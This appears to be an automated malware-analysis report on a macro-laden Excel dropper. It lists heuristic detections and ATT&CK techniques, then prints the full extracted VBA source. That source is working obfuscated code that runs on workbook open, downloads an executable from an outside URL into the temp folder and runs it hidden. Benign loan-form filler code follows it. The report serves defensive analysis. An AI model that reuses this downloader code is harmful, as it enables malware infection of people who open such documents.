MALICIOUS
438
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is an Excel document containing VBA macros. The Workbook_Open macro is triggered upon opening, which constructs a URL to download a file and then executes it using WScript.Shell. The document body explicitly instructs the user to 'enable content' to view the document, acting as a lure. The VBA script reconstructs the download URL as 'http://1stchoicepestcontrol.co.za/image.exe' and saves the payload to a temporary path as 'exe.by98j'.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set w = CreateObject("WScript.Shell") -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
Set w = CreateObject("WScript.Shell") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
.Write r.ResponseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set w = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Public Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
se = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.by98j") -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://1stchoicepestcontrol.co.za/image.exe Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16450 bytes |
SHA-256: 99f8b179f73ae111431c8ec811b94f9ea4cf5f151ded0057c4474a426314ed26 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
d0rfavlqmrk
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "qhm12orluum"
Sub d0rfavlqmrk()
Dim s As String
l = "http://1stchoicepestcontrol.co.za/image.exe"
On Error Resume Next
se = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.by98j")
minus l, se
sdfeerrff se, ""
End
End Sub
Sub sdfeerrff(p, j)
On Error Resume Next
Set w = CreateObject("WScript.Shell")
w.Run p & " " & j & " ", INVISIBLE, NOWAIT
End Sub
Sub minus(u, f)
On Error Resume Next
Dim ob2dua5uope As Integer
Dim AA14kaks04vhr As Integer
Dim u3tut2sh5ta As Integer
Dim qebkzzladvb As Integer
Dim pch1gp2p025 As Integer
Dim sru2gzci0on As Integer
Dim AA3qfa0p0sser As Integer
Dim AA1t1gzn5kqsu As Integer
Dim zwaulqjotbo As Integer
Dim fnmg405sk13 As Integer
Dim rlcsqwrjkeh As Integer
Dim iburpnfsf1w As Integer
Dim mma3fskvkvl As Integer
Dim x0kv5fxf3qy As Integer
Dim gjaet22ap2g As Integer
Dim jsg2agy31y1 As Integer
Dim zs4qmtlizao As Integer
Dim dygp42hfkb4 As Integer
Dim u5o5ta41dmn As Integer
Dim n4ou4co5jrj As Integer
Set r = CreateObject("WinHttp.WinHttpRequest.5.1")
r.Open "GET", u, False
r.Send
Dim pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej As Integer
Dim aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf As Integer
Dim zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr As Integer
Dim a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf As Long
Dim jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky As Integer
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 837
For jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky = 0 To 5
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "a6wqfhp552gynsfhwndl88m8h6l8yjbipmgdsp0wjh441b5nr45520"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "aniunjxmasv1ua2wclxs4abkb0rivhksa2ysy7e8qv0yqiqj8t3146"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1841
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 1745
Next jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky
Set fs = CreateObject("Scripting.FileSystemObject")
If fs.FileExists(f) Then
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259
fs.DeleteFile (f)
End If
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "aniunjxmasv1ua2wclxs4abkb0rivhksa2ysy7e8qv0yqiqj8t3146"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1841
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 1745
'Next jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky
If r.Status = 200 Then
Set st = CreateObject("ADODB.Stream")
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259
With st
.Type = 1
.Open
.Write r.ResponseBody
.SaveToFile f
.Close
End With
Set st = Nothing
End If
End Sub
Private Sub Command2_Click()
ID = txtid.Text
OpenConn
sql = "SELECT * FROM LoanManagement WHERE clng(ID)='" & ID & "'"
Set rsupdate = New ADODB.Recordset
rsupdate.Open sql, con, adOpenStatic, adLockOptimistic
If Not rsupdate.EOF Then
With rsupdate
!Amountpaid = txtNewAmount.Text
!Datepaid = txtNewDate.Text
!Amountremaining = txtAmontRemaining.Text
.Update
End With
MsgBox "Record successfully updated..", vbInformation, "Success"
fillgrid
txtid.Text = ""
txtAccName.Text = ""
txtAccNo.Text = ""
txtLoanAmount.Text = ""
txtMonthlyRepayment.Text = ""
txtRepayAmount.Text = ""
txtLoanofficer.Text = ""
txtDateIsued.Text = ""
txtDatedue.Text = ""
txtAmountPaid.Text = ""
txtDatePaid.Text = ""
txtAmountRemaining.Text = ""
txtCollateral.Text = ""
End If
End Sub
Private Sub Form_Load()
Call Connect
fillgrid
End Sub
Public Function fillgrid()
Dim c As Integer
Dim r As Integer
Call Connect
Dim sql As String
rsusergrid.CursorLocation = adUseClient
'---Sql command
sql = "select * from LoanManagement"
rsusergrid.Open sql, con, adOpenKeyset, adLockOptimistic
With FlexMember
FlexMember.Cols = rsusergrid.Fields.Count + 1
FlexMember.ColWidth(0) = 0
For c = 0 To rsusergrid.Fields.Count - 1
FlexMember.TextMatrix(0, c + 1) = rsusergrid(c).Name
Next
FlexMember.Rows = rsusergrid.RecordCount + 1
For r = 1 To rsusergrid.RecordCount
For c = 0 To rsusergrid.Fields.Count - 1
FlexMember.TextMatrix(r, c + 1) = IIf(IsNull(rsusergrid(c).Value), "{Null}", rsusergrid(c).Value)
Next c
rsusergrid.MoveNext
Next r
End With
End Function
'CODES FOR DISPLAYING DATA IN TEXT BOXES AND IMAGE CONTROL
Private Sub FlexMember_Click()
'---first clear textboxes and image control
On Error Resume Next
txtid.Text = ""
txtAccName.Text = ""
txtAccNo.Text = ""
'txtAddress.Text = ""
txtLoanAmount.Text = ""
'txtInterest.Text = ""
'cmbLoanPeriod.Text = ""
txtMonthlyRepayment.Text = ""
txtRepayAmount.Text = ""
'txtBankBranch.Text = ""
'txtIssueDate.Text = ""
'txtOccupation.Text = ""
'txtPhoneno.Text = ""
'cmbLoantype.Text = ""
txtLoanofficer.Text = ""
txtDateIsued.Text = ""
txtDatedue.Text = ""
txtAmountPaid = ""
txtDatePaid = ""
txtAmountRemaining = ""
txtCollateral = ""
'----then connect to database by calling that function i.e connect
Call Connect
'---then write sql command to fetch data from database
rsusergrid.Open "select * from LoanManagement", con, adOpenDynamic, adLockOptimistic
rsusergrid.MoveFirst
'---this fill the datagrid view with row from database,arranged by column number
rsusergrid.Move FlexMember.Row - 1
txtid.Text = FlexMember.TextMatrix(FlexMember.Row, 1)
txtAccName.Text = FlexMember.TextMatrix(FlexMember.Row, 2)
txtAccNo.Text = FlexMember.TextMatrix(FlexMember.Row, 3)
'txtAddress.Text = FlexMember.TextMatrix(FlexMember.Row, 4)
txtLoanAmount.Text = FlexMember.TextMatrix(FlexMember.Row, 5)
'txtInterest.Text = FlexMember.TextMatrix(FlexMember.Row, 6)
'cmbLoanPeriod.Text = FlexMember.TextMatrix(FlexMember.Row, 7)
txtMonthlyRepayment.Text = FlexMember.TextMatrix(FlexMember.Row, 8)
txtRepayAmount.Text = FlexMember.TextMatrix(FlexMember.Row, 9)
'txtBankBranch.Text = FlexMember.TextMatrix(FlexMember.Row, 10)
'txtIssueDate.Text = FlexMember.TextMatrix(FlexMember.Row, 11)
'txtOccupation.Text = FlexMember.TextMatrix(FlexMember.Row, 12)
'txtPhoneno.Text = FlexMember.TextMatrix(FlexMember.Row, 13)
'cmbLoantype.Text = FlexMember.TextMatrix(FlexMember.Row, 14)
txtLoanofficer.Text = FlexMember.TextMatrix(FlexMember.Row, 15)
txtDateIsued.Text = FlexMember.TextMatrix(FlexMember.Row, 16)
txtDatedue.Text = FlexMember.TextMatrix(FlexMember.Row, 17)
txtAmountPaid = FlexMember.TextMatrix(FlexMember.Row, 18)
txtDatePaid = FlexMember.TextMatrix(FlexMember.Row, 19)
txtAmountRemaining = FlexMember.TextMatrix(FlexMember.Row, 20)
txtCollateral = FlexMember.TextMatrix(FlexMember.Row, 21)
End Sub
Private Sub cmdRefresh_Click()
Unload Me
End Sub
Private Sub Form_Loads()
'WHEN FORM LOAD THE FOLLOWING CODES WILL BE EXECUTED FIRST
'CODES FOR INCREMENT USER ID NUMBER IN ID TEXT BOX i.e +1
On Error Resume Next
Call Connect
con.Refresh
With rsfind
.Open "select * from LoanManagement", con, adOpenDynamic, adLockPessimistic
.MoveLast
If IsNull(.Fields("ID").Value) Then
txtid.Text = 1
Else
no = .Fields("ID") + 1
txtid.Text = no
End If
.Close
End With
Call Connect
For t = 1 To 20
cmbLoanPeriod.AddItem t
Next t
cmdSave.Enabled = False
HidePayments
End Sub
Private Sub cmdPayment_Click()
On Error Resume Next
'This section Computes the Loan Repayment
'First, it makes sure all data are supplied
'It then substitute the Data to the formular: (P*R*T)/100
'Results obtained are Displayed on the output textboxes
'it then Disable the Payment Command, allowing the User Save Command to come up
If txtAccName = "" Then
MsgBox "Enter Name", vbInformation
Exit Sub
End If
If txtAccNo.Text = "" Then
MsgBox "Enter Account Number", vbInformation
Exit Sub
End If
If txtAddress = "" Then
MsgBox "Enter Address", vbInformation
Exit Sub
End If
If txtBankBranch = "" Then
MsgBox "Enter Bank Branch", vbInformation
Exit Sub
End If
If txtIssueDate = "" Then
MsgBox "Enter Issue Date", vbInformation
Exit Sub
End If
If txtOccupation = "" Then
MsgBox "Enter Occupation", vbInformation
Exit Sub
End If
If txtPhoneno = "" Then
MsgBox "Enter Phone Number", vbInformation
Exit Sub
End If
If txtLoanAmount.Text = "" Then
MsgBox "Enter Loan Amount", vbInformation
Exit Sub
End If
If txtInterest.Text = "" Then
MsgBox "Set Interest", vbInformation
Exit Sub
End If
If cmbLoanPeriod.Text = "" Then
MsgBox "Enter Loan Period", vbInformation
Exit Sub
End If
If txtCollateral.Text = "" Then
MsgBox "Enter Collateral", vbInformation
Exit Sub
End If
ShowPayments
Dim Repay As Double
Dim repayment As Double
Repay = (txtLoanAmount.Text * txtInterest.Text * cmbLoanPeriod.Text) / 100
repayment = Format(Repay + txtLoanAmount, "##,##0.00")
If optYears.Value = True Then
txtMonthlyRepayment.Text = (repayment) / (cmbLoanPeriod * 12)
End If
If optMonths.Value = True Then
txtMonthlyRepayment.Text = (repayment / cmbLoanPeriod)
End If
txtRepayAmount.Text = repayment
cmdPayment.Enabled = False
cmdSave.Enabled = True
cmdSave.SetFocus
End Sub
Private Sub cmdSave_Click()
If txtLoanofficer.Text = "" Then
MsgBox "Enter Name of Loan Officer", vbInformation
Exit Sub
End If
If txtDateIsued.Text = "" Then
MsgBox "Enter Date Issued", vbInformation
Exit Sub
End If
If txtDatedue.Text = "" Then
MsgBox "Enter Date due", vbInformation
Exit Sub
End If
Call Connect
With rsuser
.AddNew
.Fields("ID") = frmAdd.txtid.Text
.Fields("Accountname") = frmAdd.txtAccName.Text
.Fields("Accountnumber") = frmAdd.txtAccNo.Text
.Fields("Address") = frmAdd.txtAddress.Text
.Fields("Amountofloan") = frmAdd.txtLoanAmount.Text
.Fields("interestcharged") = frmAdd.txtInterest.Text
.Fields("Periodofloan") = frmAdd.cmbLoanPeriod.Text
.Fields("Monthlyrepayment") = frmAdd.txtMonthlyRepayment.Text
.Fields("Totalrepayment") = frmAdd.txtRepayAmount.Text
.Fields("Bankbranch") = frmAdd.txtBankBranch.Text
.Fields("Issuedate") = frmAdd.txtIssueDate.Text
.Fields("Occupation") = frmAdd.txtOccupation.Text
.Fields("Phoneno") = frmAdd.txtPhoneno.Text
.Fields("Typeofloan") = frmAdd.cmbLoantype.Text
.Fields("Loanofficer") = frmAdd.txtLoanofficer.Text
.Fields("Dateissued") = frmAdd.txtDateIsued.Text
.Fields("Datedue") = frmAdd.txtDatedue.Text
.Fields("Amountremaining") = frmAdd.txtRepayAmount.Text
.Fields("Collateral") = frmAdd.txtCollateral.Text
.Update
.Close
con.Close
End With
'*********************************************************************
'MESSAGE BOX CODES ASSOCIATED WITH ADD EVENT
MsgBox "Information Successfully Added, Please Proceed", vbInformation, "INFORMATION"
Dim rep
rep = MsgBox("Do you wish to add new information ?", vbInformation + vbYesNo, "Add New Record")
If rep = vbYes Then
Load frmAdd
Load Me
frmAdd.Show
Else
Unload Me
frmMain.Show
End If
'***************************************************************
'CODES FOR INCREMENT USER ID NUMBER IN ID TEXT BOX i.e +1
On Error Resume Next
Call Connect
con.Refresh
With rsfind
.Open "select * from LoanManagement", con, adOpenDynamic, adLockPessimistic
.MoveLast
If IsNull(.Fields("ID").Value) Then
txtid.Text = 1
Else
no = .Fields("ID") + 1
txtid.Text = no
End If
.Close
End With
'**************************************
'NO ID SHOULD FOLLOW
txtAccName.Text = ""
txtAccNo.Text = ""
txtAddress.Text = ""
txtLoanAmount.Text = ""
txtInterest.Text = ""
cmbLoanPeriod.Text = ""
txtMonthlyRepayment.Text = ""
txtRepayAmount.Text = ""
txtBankBranch.Text = ""
txtIssueDate.Text = ""
txtOccupation.Text = ""
txtPhoneno.Text = ""
cmbLoantype.Text = ""
txtLoanofficer.Text = ""
txtDateIsued.Text = ""
txtDatedue.Text = ""
End Sub
Private Sub optMonths_Click()
'List 12 months only
'cmbLoanPeriod.Clear
For t = 1 To 12
cmbLoanPeriod.AddItem t
Next t
If txtMonthlyRepayment.Text <> "" Then
cmdPayment_Click
End If
End Sub
Private Sub optYears_Click()
'List up to 20 years
'cmbLoanPeriod.Clear
For t = 1 To 20
cmbLoanPeriod.AddItem t
Next t
If txtMonthlyRepayment.Text <> "" Then
cmdPayment_Click
End If
End Sub
Private Sub txtLoanAmount_LostFocus()
txtLoanAmount.Text = Format(txtLoanAmount.Text, "##,##0")
End Sub
Private Sub txtMonthlyRepayment_LostFocus()
txtMonthlyRepayment.Text = Format(txtMonthlyRepayment.Text, "0.00")
End Sub
Private Sub updInterest_Change()
txtInterest.Text = Str(updInterest.Value) '& " %"
End Sub
Sub ShowPayments()
txtMonthlyRepayment.Visible = True
txtRepayAmount.Visible = True
Label1(9).Visible = True
Label1(5).Visible = True
End Sub
Sub HidePayments()
txtMonthlyRepayment.Visible = False
txtRepayAmount.Visible = False
Label1(9).Visible = False
Label1(5).Visible = False
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 43008 bytes |
SHA-256: 2bb0b0be1abf6694345889085a0bd4556761a9e2939c9bceca47fb93810e9fea |
|||
|
Detection
ClamAV:
Doc.Dropper.Agent-6412232-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.